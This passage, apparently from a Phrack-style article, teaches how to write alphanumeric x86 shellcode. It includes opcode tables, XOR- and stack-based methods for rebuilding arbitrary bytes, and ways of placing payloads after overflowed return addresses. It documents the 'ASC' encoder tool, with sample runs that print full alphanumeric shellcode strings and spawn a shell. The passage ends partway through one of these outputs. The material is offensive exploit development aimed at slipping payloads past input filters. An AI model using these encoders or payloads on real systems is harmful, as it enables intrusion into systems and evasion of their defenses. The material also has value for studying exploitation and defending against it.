+<r/m>           |      |      |      |      |      |      |      |
+--:-------------+------+------+------+------+------+------+------+------
+(mod=00)        |      |      |      |      |      |      |      |
+[eax]           |00    |08    |10    |18    |20    |28    |30 '0'|38 '8'
+[ecx]           |01    |09    |11    |19    |21    |29    |31 '1'|39 '9'
+[edx]           |02    |0A    |12    |1A    |22    |2A    |32 '2'|3A
+[ebx]           |03    |0B    |13    |1B    |23    |2B    |33 '3'|3B
+[<SIB>]         |04    |0C    |14    |1C    |24    |2C    |34 '4'|3C
+[<disp32>]      |05    |0D    |15    |1D    |25    |2D    |35 '5'|3D
+[esi]           |06    |0E    |16    |1E    |26    |2E    |36 '6'|3E
+[edi]           |07    |0F    |17    |1F    |27    |2F    |37 '7'|3F
+----------------+------+------+------+------+------+------+------+------
+(mod=01)        |      |      |      |      |      |      |      |
+[eax+<disp8>]   |40    |48 'H'|50 'P'|58 'X'|60    |68 'h'|70 'p'|78 'x'
+[ecx+<disp8>]   |41 'A'|49 'I'|51 'Q'|59 'Y'|61 'a'|69 'i'|71 'q'|79 'y'
+[edx+<disp8>]   |42 'B'|4A 'J'|52 'R'|5A 'Z'|62 'b'|6A 'j'|72 'r'|7A 'z'
+[ebx+<disp8>]   |43 'C'|4B 'K'|53 'S'|5B    |63 'c'|6B 'k'|73 's'|7B
+[<SIB>+<disp8>] |44 'D'|4C 'L'|54 'T'|5C    |64 'd'|6C 'l'|74 't'|7C
+[ebp+<disp8>]   |45 'E'|4D 'M'|55 'U'|5D    |65 'e'|6D 'm'|75 'u'|7D
+[esi+<disp8>]   |46 'F'|4E 'N'|56 'V'|5E    |66 'f'|6E 'n'|76 'v'|7E
+[edi+<disp8>]   |47 'G'|4F 'O'|57 'W'|5F    |67 'g'|6F 'o'|77 'w'|7F
+----------------+------+------+------+------+------+------+------+------
+(mod=10)        |      |      |      |      |      |      |      |
+[eax+<disp32>]  |80    |88    |90    |98    |A0    |A8    |B0    |B8
+[ecx+<disp32>]  |81    |89    |91    |99    |A1    |A9    |B1    |B9
+[edx+<disp32>]  |82    |8A    |92    |9A    |A2    |AA    |B2    |BA
+[ebx+<disp32>]  |83    |8B    |93    |9B    |A3    |AB    |B3    |BB
+[<SIB>+<disp32>]|84    |8C    |94    |9C    |A4    |AC    |B4    |BC
+[ebp+<disp32>]  |85    |8D    |95    |9D    |A5    |AD    |B5    |BD
+[esi+<disp32>]  |86    |8E    |96    |9E    |A6    |AE    |B6    |BE
+[edi+<disp32>]  |87    |8F    |97    |9F    |A7    |AF    |B7    |BF
+---+------------+------+------+------+------+------+------+------+------
+(mod=11)        |      |      |      |      |      |      |      |
+al | eax        |C0    |C8    |D0    |D8    |E0    |E8    |F0    |F8
+cl | ecx        |C1    |C9    |D1    |D9    |E1    |E9    |F1    |F9
+dl | edx        |C2    |CA    |D2    |DA    |E2    |EA    |F2    |FA
+bl | ebx        |C3    |CB    |D3    |DB    |E3    |EB    |F3    |FB
+ah | esp        |C4    |CC    |D4    |DC    |E4    |EC    |F4    |FC
+ch | ebp        |C5    |CD    |D5    |DD    |E5    |ED    |F5    |FD
+dh | esi        |C6    |CE    |D6    |DE    |E6    |EE    |F6    |FE
+bh | edi        |C7    |CF    |D7    |DF    |E7    |EF    |F7    |FF
+
+What can we deduct this time for XOR and CMP?
+
+- SOME "xor [<r32>],dh" AND "xor [<r32>],bh" INSTRUCTIONS.
+- THE "xor [<disp32>],dh" INSTRUCTION.
+- SOME "xor [<r32>+<disp8>],<r8>" INSTRUCTIONS.
+- NO "xor <r8>,<r8>" INSTRUCTIONS.
+
+- SOME "xor [<r32>],esi" AND "xor [<r32>],edi" INSTRUCTIONS.
+- THE "xor [<disp32>],esi" INSTRUCTION.
+- SOME "xor [<r32>+<disp8>],<r32>" INSTRUCTIONS.
+- NO "xor <r32>,<r32>" INSTRUCTIONS.
+
+- SOME "xor dh,[<r32>]" AND "xor bh,[<r32>]" INSTRUCTIONS.
+- THE "xor dh,[<disp32>]" INSTRUCTION.
+- SOME "xor <r8>,[<r32>+<disp8>]" INSTRUCTIONS.
+
+- SOME "xor esi,[<r32>]" AND "xor edi,[<r32>]" INSTRUCTIONS.
+- THE "xor esi,[<disp32>]" INSTRUCTION.
+- SOME "xor <r32>,[<r32>+<disp8>]" INSTRUCTIONS.
+
+- SOME "cmp [<r32>],dh" AND "cmp [<r32>],bh" INSTRUCTIONS.
+- THE "cmp [<disp32>],dh" INSTRUCTION.
+- SOME "cmp [<r32>+<disp8>],<r8>" INSTRUCTIONS.
+- NO "cmp <r8>,<r8>" INSTRUCTIONS.
+
+- SOME "cmp [<r32>],esi" AND "cmp [<r32>],edi" INSTRUCTIONS.
+- THE "cmp [<disp32>],esi" INSTRUCTION.
+- SOME "cmp [<r32>+<disp8>],<r32>" INSTRUCTIONS.
+- NO "cmp <r32>,<r32>" INSTRUCTIONS.
+
+
+THE "SIB" BYTE:
+
+To be complete, we must also analyze possibilities offered by the Scale
+Index Base byte ("<SIB>" in our last array). This SIB byte allows us to
+create addresses having the following form:
+ <SIB> = <base>+(2^<scale>)*<index>
+Where:
+ <base>  : indicate a base register.
+ <index> : indicate an index register.
+ <scale> : indicate a scale factor for the index register.
+
+Here are the different bit fields of this byte:
+
+  7 6 5 4 3 2 1 0 
+ +---+-----+-----+
+ |sc.|index|base |
+ +---+-----+-----+
+
+Let's have a look at this last array:
+
+    <base>:| eax  | ecx  | edx  | ebx  | esp  | ebp  | esi  | edi
+           |      |      |      |      |      | (if  |      |
+(2^<scale>)|      |      |      |      |      |  MOD |      |
+*<index>   |      |      |      |      |      | !=00)|      |
+----:------+------+------+------+------+------+------+------+------
+eax        |00    |01    |02    |03    |04    |05    |06    |07
+ecx        |08    |09    |0A    |0B    |0C    |0D    |0E    |0F
+edx        |10    |11    |12    |13    |14    |15    |16    |17
+ebx        |18    |19    |1A    |1B    |1C    |1D    |1E    |1F
+0          |20    |21    |22    |23    |24    |25    |26    |27
+ebp        |28    |29    |2A    |2B    |2C    |2D    |2E    |2F
+esi        |30 '0'|31 '1'|32 '2'|33 '3'|34 '4'|35 '5'|36 '6'|37 '7'
+edi        |38 '8'|39 '9'|3A    |3B    |3C    |3D    |3E    |3F
+-----------+------+------+------+------+------+------+------+------
+2*eax      |40    |41 'A'|42 'B'|43 'C'|44 'D'|45 'E'|46 'F'|47 'G'
+2*ecx      |48 'H'|49 'I'|4A 'J'|4B 'K'|4C 'L'|4D 'M'|4E 'N'|4F 'O'
+2*edx      |50 'P'|51 'Q'|52 'R'|53 'S'|54 'T'|55 'U'|56 'V'|57 'W'
+2*ebx      |58 'X'|59 'Y'|5A 'Z'|5B    |5C    |5D    |5E    |5F
+0          |60    |61 'a'|62 'b'|63 'c'|64 'd'|65 'e'|66 'f'|67 'g'
+2*ebp      |68 'h'|69 'i'|6A 'j'|6B 'k'|6C 'l'|6D 'm'|6E 'n'|6F 'o'
+2*esi      |70 'p'|71 'q'|72 'r'|73 's'|74 't'|75 'u'|76 'v'|77 'w'
+2*edi      |78 'x'|79 'y'|7A 'z'|7B    |7C    |7D    |7E    |7F
+-----------+------+------+------+------+------+------+------+------
+4*eax      |80    |81    |82    |83    |84    |85    |86    |87
+4*ecx      |88    |89    |8A    |8B    |8C    |8D    |8E    |8F
+4*edx      |90    |91    |92    |93    |94    |95    |96    |97
+4*ebx      |98    |99    |9A    |9B    |9C    |9D    |9E    |9F
+0          |A0    |A1    |A2    |A3    |A4    |A5    |A6    |A7
+4*ebp      |A8    |A9    |AA    |AB    |AC    |AD    |AE    |AF
+4*esi      |B0    |B1    |B2    |B3    |B4    |B5    |B6    |B7
+4*edi      |B8    |B9    |BA    |BB    |BC    |BD    |BE    |BF
+-----------+------+------+------+------+------+------+------+------
+8*eax      |C0    |C1    |C2    |C3    |C4    |C5    |C6    |C7
+8*ecx      |C8    |C9    |CA    |CB    |CC    |CD    |CE    |CF
+8*edx      |D0    |D1    |D2    |D3    |D4    |D5    |D6    |D7
+8*ebx      |D8    |D9    |DA    |DB    |DC    |DD    |DE    |DF
+0          |E0    |E1    |E2    |E3    |E4    |E5    |E6    |E7
+8*ebp      |E8    |E9    |EA    |EB    |EC    |ED    |EE    |EF
+8*esi      |F0    |F1    |F2    |F3    |F4    |F5    |F6    |F7
+8*edi      |F8    |F9    |FA    |FB    |FC    |FD    |FE    |FF
+-----------+------+------+------+------+------+------+------+------
+(if <base> |
+   ==ebp   | => <SIB> = <disp32>+(2^<scale>)*<index>
+and MOD==0)|
+-----------+-------------------------------------------------------
+
+What can we deduct of this last array?
+- SOME "<r32>+esi" SIB ADDRESSES.
+- SOME "<r32>+2*<r32>" SIB ADDRESSES.
+- NO "<r32>+4*<r32>" OR "<r32>+8*<r32>" SIB ADDRESSES.
+
+
+Also remember that the usual bytes order for a full instruction with
+possibly ModR/M, SIB byte and disp8/disp32 is:
+ <opcode> [Mode R/M byte] [<SIB>] [<disp8>/<disp32>]
+
+
+THE "XOR" INSTRUCTION:
+
+We notice that we have some possibilities for the XOR instruction. Let's
+remember briefly all possible logical combinations:
+
+a | b | a XOR b (=c)
+--+---+-------------
+0 | 0 |    0
+0 | 1 |    1
+1 | 0 |    1
+1 | 1 |    0
+
+What can we deduct of this?
+-  a XOR a = 0
+ => we can easily initialize registers to 0.
+-  0 XOR b = b
+ => we can easily load values in registers containing 0.
+-  1 XOR b = NOT b
+ => we can easily invert values using registers containing 0xFFFFFFFF.
+-  a XOR b = c
+   b XOR c = a
+   a XOR c = b
+ => we can easily find a byte's XOR complement.
+
+
+
+----| Classic manipulations
+
+
+Now, we are going to see various methods permitting to achieve a maximum
+of usual low level manipulations from the authorized instructions listed
+above.
+
+
+INITIALIZING REGISTERS WITH PARTICULAR VALUES:
+
+First of all, let's think about a method allowing us to initialize some
+very useful particular values in our registers, like 0 or 0xFFFFFFFF
+(see alphanumeric_initialize_registers() in asc.c).
+For example:
+
+ push 'aaaa'                      ; 'a' 'a' 'a' 'a'
+ pop eax                          ;EAX now contains 'aaaa'.
+ xor eax,'aaaa'                   ;EAX now contains 0.
+
+ dec eax                          ;EAX now contains 0xFFFFFFFF.
+
+We are going to memorize those special values in particular registers, to
+be able to use them easily.
+
+
+INITIALIZING ALL REGISTERS:
+
+At the beginning of our shellcode, we will need to initialize several
+registers with values that we will probably use later.
+Don't forget that we can't use POP with all registers (only EAX,ECX and
+EDX) We will then use POPAD. For example, if we suppose EAX contain 0 and
+ECX contain 'aaaa', we can initialize all our registers easily:
+
+ push eax                         ;EAX will contain 0.
+ push ecx                         ;no change to ECX ('aaaa').
+ push esp                         ;EDX will contain ESP after POPAD.
+ push eax                         ;EBX will contain 0.
+ push esp                         ;no change to ESP.
+ push ebp                         ;no change to EBP.
+ push ecx                         ;ESI will contain 'aaaa' after POPAD.
+ dec eax                          ;EAX will contain 0xFFFFFFFF.
+ push eax                         ;EDI will contain 0xFFFFFFFF.
+ popad                            ;we get all values from the stack.
+
+
+COPYING FROM REGISTERS TO REGISTERS:
+
+Using POPAD, we can also copy data from any register to any register, if
+we can't PUSH/POP directly. For example, copying EAX to EBX:
+
+ push eax                         ;no change.
+ push ecx                         ;no change.
+ push edx                         ;no change.
+ push eax                         ;EBX will contain EAX after POPAD.
+ push eax                         ;no change (ESP not "poped").
+ push ebp                         ;no change.
+ push esi                         ;no change.
+ push edi                         ;no change.
+ popad
+
+Let's note that the ESP's value is changed before the PUSH since we have 2
+PUSH preceding it, but POPAD POP all registers except ESP from the stack.
+
+
+SIMULATING A "NOT" INSTRUCTION:
+
+By using XOR, we can easily realize a classical NOT instruction. Suppose
+EAX contains the value we want to invert, and EDI contains 0xFFFFFFFF:
+
+ push eax                         ;we push the value we want to invert.
+ push esp                         ;we push the offset of the value we
+                                  ; pushed on the stack.
+ pop ecx                          ;ECX now contains this offset.
+ xor [ecx],edi                    ;we invert the value.
+ pop eax                          ;we get it back in EAX.
+
+
+READING BYTES FROM MEMORY TO A REGISTER:
+
+Once again, by using XOR and the 0 value (here in EAX), we can read an
+arbitrary byte into DH:
+
+ push eax                         ;we push 0 on the stack.
+ pop edx                          ;we get it back in ECX (DH is now 0).
+ xor dh,[esi]                     ;we read our byte using [esi] as source
+                                  ;address.                              
+
+We can also read values not far from [esp] on the stack, by using DEC/INC
+on ESP, and then using a classical POP.
+
+
+WRITING ALPHANUMERIC BYTES TO MEMORY:
+
+If we need a small place to write bytes, we can easily use PUSH and write
+our bytes by decreasing memory addresses and playing with INC on ESP.
+
+ push 'cdef'                      ;                 'c' 'd' 'e' 'f'
+ push 'XXab'                      ; 'X' 'X' 'a' 'b' 'c' 'd' 'e' 'f'
+ inc esp                          ;     'X' 'a' 'b' 'c' 'd' 'e' 'f'
+ inc esp                          ;         'a' 'b' 'c' 'd' 'e' 'f'
+
+Now, ESP points at a "abcdef" string written on the stack...
+We can also use the 016 instruction prefix to directly push a 16 bits
+value:
+
+ push 'cdef'                      ;         'c' 'd' 'e' 'f'
+ push 'ab'                        ; 'a' 'b' 'c' 'd' 'e' 'f'
+
+
+
+----| The methods
+
+
+Now, let's combine some of these interesting manipulations to effectively
+generate alphanumeric shellcodes .
+We are going to generate an alphanumeric engine, that will build our
+original (non-alphanumeric) shellcode. We will propose 2 different
+techniques:
+
+
+USING THE STACK:
+
+Because we have a set of instructions related to the stack, we are going
+to use them efficiently.
+In fact, we are going to construct our original code gradually while
+pushing values on the stack, from the last byte (B1) of our original
+shellcode to the first one (see alphanumeric_stack_generate() and
+"-m stack" option in asc.c):
+
+ .... 00  00  00  00  00  00  00  00  00  00  00  00  SS  SS  SS  SS ....
+
+ .... 00  00  00  00  00  00  00  00  00  00  B2  B1  SS  SS  SS  SS ....
+                                              <-----
+ .... 00  00  00  00  00  00  00  B5  B4  B3  B2  B1  SS  SS  SS  SS ....
+                                  <-----------------
+ .... 00  00  00  B9  B8  B7  B6  B5  B4  B3  B2  B1  SS  SS  SS  SS ....
+                  <-------original shellcode--------
+
+Where: SS represents bytes already present on the stack.
+       00 represents non used bytes on the stack.
+       Bx represents bytes of our original non-alphanumeric shellcode.
+
+It is really easy, because we have instructions to push doublewords or
+words, and we can also play with INC ESP to simply push a byte.
+The problem is that we cannot directly push non-alphanumeric bytes. Let's
+try to classify bytes of our original code in different categories.
+(see alphanumeric_stack_get_category() in asc.c).
+We can thus write tiny blocks of 1,2,3 or 4 bytes from the same category
+on the stack (see alphanumeric_stack_generate_push() in asc.c).
+Let's observe how to realize that:
+
+- CATEGORY_00:
+ We suppose the register (<r>,<r32>,<r16>) contains the 0xFFFFFFFF value.
+ 
+  1 BYTE:
+   inc <r32>                      ;<r32> now contains 0.
+   push <r16>                     ; 00  00
+   inc esp                        ;     00
+   dec <r32>                      ;<r32> now contains 0xFFFFFFFF.
+   
+  2 BYTES:
+   inc <r32>                      ;<r32> now contains 0.
+   push <r16>                     ; 00  00
+   dec <r32>                      ;<r32> now contains 0xFFFFFFFF.   
+
+  3 BYTES:
+   inc <r32>                      ;<r32> now contains 0.
+   push <r32>                     ; 00  00  00  00
+   inc esp                        ;     00  00  00
+   dec <r32>                      ;<r32> now contains 0xFFFFFFFF.      
+
+  4 BYTES:
+   inc <r32>                      ;<r32> now contains 0.
+   push <r32>                     ; 00  00  00  00
+   dec <r32>                      ;<r32> now contains 0xFFFFFFFF.      
+
+- CATEGORY_FF:
+ We use the same mechanism as for CATEGORY_00, except that we don't need
+ to INC/DEC the register containing 0xFFFFFFFF.
+ 
+- CATEGORY_ALPHA:
+ We simply push the alphanumeric values on the stack, possibly using a
+ random alphanumeric byte "??" to fill the doubleword or the word.
+ 
+  1 BYTE:
+   push 0x??B1                    ; ??  B1
+   inc esp                        ;     B1
+
+  2 BYTES:
+   push 0xB2B1                    ; B2  B1
+
+  3 BYTES:
+   push 0x??B3B2B1                ; ??  B3  B2  B1
+   inc esp                        ;     B3  B2  B1
+
+  4 BYTES:
+   push 0xB4B3B2B1                ; B4  B3  B2  B1    
+
+- CATEGORY_XOR:
+ We choose random alphanumeric bytes X1,X2,X3,X4 and Y1,Y2,Y3,Y4, so that
+ X1 xor Y1 = B1, X2 xor Y2 = B2, X3 xor Y3 = B3 and X4 xor Y4 = B4
+ (see alphanumeric_get_complement() in asc.c).
+
+  1 BYTE:
+   push 0x??X1                    ; ??  X1
+   pop ax                         ;AX now contains 0x??X1.
+   xor ax,0x??Y1                  ;AX now contains 0x??B1.
+   push ax                        ; ??  B1
+   inc esp                        ;     B1
+  
+  2 BYTES:
+   push 0xX2X1                    ; X2  X1
+   pop ax                         ;AX now contains 0xX2X1.
+   xor ax,0xY2Y1                  ;AX now contains 0xB2B1.
+   push ax                        ; B2  B1
+
+  3 BYTES:
+   push 0x??X3X2X1                ; ??  X3  X2  X1
+   pop eax                        ;EAX now contains 0x??X3X2X1.
+   xor eax,0x??Y3Y2Y1             ;EAX now contains 0x??B3B2B1.
+   push eax                       ; ??  B3  B2  B1
+   inc eax                        ;     B3  B2  B1
+
+  4 BYTES:
+   push 0xX4X3X2X1                ; X4  X3  X2  X1
+   pop eax                        ;EAX now contains 0xX4X3X2X1.
+   xor eax,0xY4Y3Y2Y1             ;EAX now contains 0xB4B3B2B1.
+   push eax                       ; B4  B3  B2  B1
+
+- CATEGORY_ALPHA_NOT and CATEGORY_XOR_NOT:
+ We simply generate CATEGORY_ALPHA and CATEGORY_XOR bytes (N1,N2,N3,N4) by
+ realizing a NOT operation on the original value. We must then cancel the
+ effect of this operation, by realizing again a NOT operation but this
+ time on the stack (see alphanumeric_stack_generate_not() in asc.c).
+
+  1 BYTE:
+   push esp
+   pop ecx                        ;ECX now contains ESP.
+                                  ; N1
+   xor [ecx],<r8>                 ; B1
+
+  2 BYTES:
+   push esp
+   pop ecx                        ;ECX now contains ESP.
+                                  ; N2  N1
+   xor [ecx],<r16>                ; B2  B1
+
+  3 BYTES:
+   push esp
+   pop ecx                        ;ECX now contains ESP.
+                                  ;     N3  N2  N1
+   dec ecx                        ; ??  N3  N2  N1
+   xor [ecx],<r32>                ; ??  B3  B2  B1
+   inc ecx                        ;     B3  B2  B1
+
+  4 BYTES:
+   push esp
+   pop ecx                        ;ECX now contains ESP.
+                                  ; N4  N3  N2  N1
+   xor [ecx],<r32>                ; B4  B3  B2  B1
+
+While adding each of these small codes, with the appropriate values, to
+our alphanumeric shellcode, we'll generate an alphanumeric shellcode wich
+will build our non-alphanumeric shellcode on the stack.
+
+
+USING "XOR PATCHES":
+
+Another possibility is to take advantage of an interesting addressing
+mode, using both ModR/M and SIB bytes in combination with the following
+XOR instruction (see alphanumeric_patches_generate_xor() and "-m patches"
+option in asc.c):
+
+ xor [<base>+2*<index>+<disp8>],<r8>
+ xor [<base>+2*<index>+<disp8>],<r16> 
+ xor [<base>+2*<index>+<disp8>],<r32>
+
+Suppose we have such an architecture for our shellcode:
+
+ [initialization][patcher][               data                ]
+
+We can initialize some values and registers in [initialization], then use
+XOR instructions in [patcher] to patch bytes in [data]:
+(see alphanumeric_patches_generate() in asc.c)
+
+ [initialization][patcher][original non-alphanumeric shellcode]
+
+To use this technique, we need to know the starting address of our
+shellcode. We can store it in a <base> register, like EBX or EDI.
+We must then calculate the offset for the first non-alphanumeric byte to
+patch, and generate this offset again by using an <index> register and an
+alphanumeric <disp8> value:
+
+ [initialization][patcher][original non-alphanumeric shellcode]
+  |                        |
+<base>         <base>+2*<index>+<disp8>
+
+The main issue here is that our offset is going to depend on the length
+of our [initialization] and [patcher]. Besides, this offset is not
+necessarily alphanumeric. Therefore, we'll generate this offset in
+[initialization], by writing it on the stack with our previous technique.
+
+We'll try to generate the smallest possible [initialization], by
+increasing gradually an arbitrary offset, trying to store the code to
+calculate it in [initialization], and possibly add some padding bytes
+(see alphanumeric_patches_generate_initialization() in asc.c):
+
+ First iteration:
+  [######################][patcher][data]
+                           |
+                         offset                         
+  [code to generate this offset] => too big.
+
+ Second iteration:
+  [##########################][patcher][data]
+                               |
+                         --->offset                         
+  [  code to generate this offset  ] => too big.
+
+ Nth iteration:
+  [#######################################][patcher][data]
+                                            |
+                         ---------------->offset
+  [ code to generate this offset ] => perfect.
+
+ Adding some padding bytes:
+  [#######################################][patcher][data]
+                                            |
+                         ---------------->offset
+  [ code to generate this offset ][padding] => to get the exact size.
+
+ And finally the compiled shellcode:
+  [ code to generate the offset  ][padding][patcher][data]
+
+We will also iterate on the <disp8> value, because some values can give us
+an easy offset to generate.
+What will contain the [data] at runtime ?
+We will use exactly the same manipulations as for the "stack technique",
+except that here, we can (we MUST !!!) have directly stored alphanumeric
+values in our [data].
+
+Another problem is that we can only use <r8>,<r16> or <r32> registers.
+It prevents us to patch 3 bytes with only one XOR instruction without
+modifying previous or next bytes.
+
+Finally, once we patched some bytes, we must increment our offset to reach
+the next bytes that we need to patch. We can simply increment our <base>,
+or increment our <disp8> value if <disp8> is always alphanumeric.
+
+
+To finish this description of the techniques, let's remember again that
+we cannot use all registers and addressing modes... We can only use the
+ones that are "alphanumeric compatibles". For example, in the "XOR
+patching technique", we decided to use the following registers:
+
+ <base> = ebx | edi
+ <index> = ebp
+ XOR register = eax | ecx
+ NOT register = dl | dh | edx | esi
+
+Let's note that those registers are randomly allocated, to add some
+basic polymorphism abilities (see alphanumeric_get_register() in asc.c).
+
+
+
+----| Some architectures and considerations
+
+
+Now, we will analyze different general architectures and considerations to
+generate alphanumeric shellcodes.
+
+
+For the "XOR patching technique", the only constraint is that we need to
+know the address of our shellcode. Usually this is trivial: we used this
+address to overflow a return address. For example, if we overwrote a
+return value, we can easily recover it at the beginning of our shellcode
+(see alphanumeric_get_address_stack() and "-a stack" option in asc.c):
+
+ dec esp
+ dec esp
+ dec esp
+ dec esp
+ pop <r32>
+
+The address can also be stored in a register (see "-a <r32>" option in
+asc.c). In this case, no preliminary manipulation will be necessary.
+
+
+For the "stack technique", we can have different interesting
+architectures, depending on the position of the buffer we try to smash.
+Let's analyze some of them briefly.
+
+If our shellcode is on the stack, followed by a sufficient space and by a
+return address, this is really perfect. Let's look at what is going to
+happen to our stack: 
+
+ .... AA  AA  AA  AA  00  00  00  00  00  00  RR  RR  RR  RR  SS  SS ....
+     [EIP]                                                   [ESP]
+
+ .... AA  AA  AA  AA  00  00  00  00  00  00  RR  BB  BB  BB  SS  SS ....
+      -->[EIP]                                   [ESP]<---------
+
+Our non-alphanumeric shellcode gets down to meet the end of our compiled
+shellcode. Once we have built our entire original shellcode, we can simply
+build padding instructions to connect both shellcodes.
+
+ .... AA  AA  AA  AA  PP  PP  PP  PP  PP  PP  RR  BB  BB  BB  SS  SS ....
+      ------>[EIP]   [ESP]<-------------------------------------
+
+ .... AA  AA  AA  AA  PP  PP  PP  PP  PP  PP  RR  BB  BB  BB  SS  SS ....
+      -------------------------------------->[EIP]
+
+Where: AA represents bytes of our alphanumeric compiled shellcode.
+       00 represents non used positions on the stack.
+       SS represents bytes already present on the stack.
+       RR represents bytes of our return address.
+       BB represents bytes of ou non-alphanumeric generated shellcode.
+       PP represents bytes of simple padding instructions (ex: INC ECX).
+
+To use this method, we must have an original shellcode with a smaller size
+compared to the space between the end of our compiled shellcode and the
+value of ESP at the beginning of the execution of our shellcode.
+We must also be sure that the last manipulations on the stack (to generate
+padding instructions) will not overwrite the last instructions of our
+compiled shellcode. If we simply generate alphanumeric padding
+instructions, it should not make any problems.
+We can also add some padding instructions at the end of our alphanumeric
+compiled shellcode, and let them be overwritten by our generated padding
+instructions. This approach is interesting for brute forcing
+(see "-s null" option in asc.c).
+
+We can also proceed in a slightly different way, if the space between our
+compiled shellcode and the original shellcode has an alphanumeric length
+(<disp8> alphanumeric). We simply use 2 inverse conditional jumps, like
+this:
+
+ [end of our compiled shellcode]
+ jo <disp8>+1 -+
+               |
+ jno <disp8> --+
+               |
+ ...           |
+               |
+label: <-------+
+ [begin of our original non-alphanumeric shellcode]
+
+
+We can also combine "stack" and "patches" techniques. We build our
+original shellcode on the stack (1), and simply jump to it once built (3).
+The problem is that we don't have alphanumeric jump instructions. We'll
+generate a JMP ESP simply by using the "patches technique" (2) on one byte
+(see "-s jmp" option in asc.c):
+
+                                            +--patch (2)-+
+                                            |            |
+ [non-alphanumeric building code][JMP ESP patching code][jmp esp]
+               |                                               |
+ +-------------+---------jump (3)------------------------------+
+ |             |
+ |           build (1)
+ |             |
+ +-> [non-alphanumeric code]
+
+We can also replace the JMP ESP by the following sequence, easier to
+generate (see "-s ret" option in asc.c):
+
+ push esp
+ ret
+
+
+Finally, we can generate yet another style of shellcode. Suppose we have a
+really big non-alphanumeric shellcode. Perhaps is it more interesting to
+compress it, and to write a small non-alphanumeric decompression engine
+(see "-s call" option in asc.c):
+
+                                            +--patch (2)--+
+                                            |             |
+ [non-alphanumeric building code][CALL ESP patching code][call esp][data]
+               |                                                 |
+ +-------------+---------call (3)--------------------------------+
+ |             |
+ |           build (1)
+ |             |
+ |   <---------+-------------------------------->
+ |
+ +-> [pop <r32>][decompression engine][jmp <r32>]
+         (4)             (5)              (6)
+
+Once the CALL ESP is executed (3), the address of [data] is pushed on the
+stack. The engine only has to pop it in a register (4), can then
+decompress the data to build the original shellcode (5), and finally jump
+to it (6).
+
+As we can see it, possibilities are really endless!
+
+
+
+----| ASC, an Alphanumeric Shellcode Compiler
+
+
+ASC offers some of the techniques proposed above.
+What about the possible options?
+
+
+COMPILATION OPTIONS:
+
+These options allow us to specify the techniques and architecture the
+alphanumeric shellcode will use to build the original shellcode.
+
+-a[ddress] stack|<r32> : allows to specify the start address of the
+ shellcode (useful for patching technique).
+ "stack" means we get the address from the stack.
+ <r32> allows to specify a register containing this starting address.
+ 
+-m[ode] stack|patches : allows to choose the type of alphanumeric
+shellcode we want to generate.
+ "stack" generates our shellcode on the stack.
+ "patches" generates our shellcode by XOR patching.
+ 
+-s[tack] call|jmp|null|ret : specifies the method (if "-m stack") to
+ return to the original shellcode on the stack.
+ "call" uses a CALL ESP instruction.
+ "jmp" uses a JMP ESP instruction.
+ "null" doesn't return to the code (if the original code is right after
+  the alphanumeric shellcode).
+ "ret" uses PUSH ESP and RET instructions.
+
+
+DEBUGGING OPTIONS:
+
+These options permit us to insert some breakpoints (int3), and observe the
+execution of our alphanumeric shellcode.
+
+-debug-start : inserts a breakpoint to the start of the compiled
+ shellcode.
+
+-debug-build-original : inserts a breakpoint before to build the original
+ shellcode.
+ 
+-debug-build-jump : inserts a breakpoint before to build the jump code
+ (if we specified the -s option). Useless if "-s null".
+
+-debug-jump : inserts a breakpoint before to run the jump instruction
+ (if we specified the -s option). If "-s null", the breakpoint will
+ simply be at the end of the alphanumeric shellcode.
+
+-debug-original : inserts a breakpoint to the beginning of the original
+ shellcode. This breakpoint will be build at runtime.
+
+
+INPUT/OUTPUT OPTIONS:
+
+-c[har] <char[] name> : specifies a C variable name where a shellcode is
+ stored:
+ 
+ char array[]= "blabla" /* my shellcode */
+               "blabla";
+ 
+ If no name is specified and several char[] arrays are present, the first
+ one will be used. The parsing recognizes C commentaries and multi-lines
+ arrays. This option also assure us that the input file is a C file, and
+ not a binary file.
+
+-f[ormat] bin|c : specifies the output file format. If C format is chosen,
+ ASC writes a tiny code to run the alphanumeric shellcode, by simulating
+ a RET address overflow. This code cannot run correctly if "-a <r32>"
+ or "-s null" options were used.
+ 
+-o[utput] <output file> : allows to specify the output filename.
+
+
+EXAMPLES:
+
+Let's finish with some practical examples, using shellcodes from nice
+previous Phrack papers ;)
+
+
+First, have a look at P49-14 (Aleph One's paper).
+The first shellcode he writes (testsc.c) contain 00 bytes (normally not a
+problem for ASC). We generate a C file and an alphanumeric shellcode,
+using "XOR patches":
+
+ rix@debian:~/phrack$ ./asc -c shellcode -f c -o alpha.c p49-14
+ Reading p49-14 ... (61 bytes)
+ Shellcode (390 bytes):
+ LLLLYhb0pLX5b0pLHSSPPWQPPaPWSUTBRDJfh5tDSRajYX0Dka0TkafhN9fYf1Lkb0TkdjfY \
+0Lkf0Tkgfh6rfYf1Lki0tkkh95h8Y1LkmjpY0Lkq0tkrh2wnuX1Dks0tkwjfX0Dkx0tkx0tky \
+CjnY0LkzC0TkzCCjtX0DkzC0tkzCj3X0Dkz0TkzC0tkzChjG3IY1LkzCCCC0tkzChpfcMX1Dk \
+zCCCC0tkzCh4pCnY1Lkz1TkzCCCCfhJGfXf1Dkzf1tkzCCjHX0DkzCCCCjvY0LkzCCCjdX0Dk \
+zC0TkzCjWX0Dkz0TkzCjdX0DkzCjXY0Lkz0tkzMdgvvn9F1r8F55h8pG9wnuvjrNfrVx2LGkG \
+3IDpfcM2KgmnJGgbinYshdvD9d
+ Writing alpha.c ...
+ Done.
+ rix@debian:~/phrack$ gcc -o alpha alpha.c
+ rix@debian:~/phrack$ ./alpha
+ sh-2.03$ exit
+ exit
+ rix@debian:~/phrack$
+
+It seems to work perfectly. Let's note the alphanumeric shellcode is also
+written to stdout.
+
+
+Now, let's compile Klog's shellcode (P55-08). We choose the "stack
+technique", with a JMP ESP to return to our original shellcode. We also
+insert some breakpoints:
+
+ rix@debian:~/phrack$ ./asc -m stack -s jmp -debug-build-jump
+  -debug-jump -debug-original -c sc_linux -f c -o alpha.c P55-08
+ Reading P55-08 ... (50 bytes)
+ Shellcode (481 bytes):
+ LLLLZhqjj9X5qjj9HPWPPSRPPafhshfhVgfXf5ZHfPDhpbinDfhUFfXf5FifPDSDhHIgGX51 \
+6poPDTYI11fhs2DTY01fhC6fXf5qvfPDfhgzfXf53EfPDTY01fhO3DfhF9fXf5yFfPDTY01fh \
+T2DTY01fhGofXf5dAfPDTY01fhztDTY09fhqmfXf59ffPDfhPNDfhbrDTY09fhDHfXf5EZfPD \
+fhV4fhxufXf57efPDfhl5DfhOSfXf53AfPDfhV4fhFafXf5GzfPDfhxGDTY01fh4IfXf5TFfP \
